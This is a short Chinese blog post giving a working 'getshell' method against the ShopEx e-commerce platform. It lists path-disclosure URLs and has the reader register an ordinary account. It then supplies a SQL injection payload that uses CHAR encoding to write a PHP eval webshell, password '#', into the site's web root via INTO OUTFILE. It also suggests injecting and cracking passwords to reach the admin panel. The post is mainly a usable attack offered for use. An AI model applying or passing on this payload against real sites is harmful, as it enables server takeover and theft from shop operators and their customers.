shopex前台普通用户getshell最新漏洞 |

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

利用方法:

第一个:想办法找到目标网站的绝对路径

 

http://www.wooyun.in/install/svinfo.php?phpinfo=true

http://www.wooyun.in/core/api/shop_api.php
http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_cat.php
http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_goodstype.php
http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_brand.php

shopex存在很多爆路径的漏洞,请自行研究。

第二个:注册一个普通用户

http://www.wooyun.in/?passport-signup.html

第三个:

发送消息

http://www.wooyun.in/?member-send.html

 

shopex前台普通用户getshell最新漏洞 |

代码

wooyun.in' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #

 

一句话的密码是#

这个漏洞,对于mysql用户权限有要求的,对于导出的目录也得有可写的要求,服务器环境也有要求。

如果无法getshell的话,也可以尝试注入,破密码进后台也一样

shell图

 

 

shopex前台普通用户getshell最新漏洞 |

 

Tags:

ShopEx漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
shopex前台普通用户getshell最新漏洞 |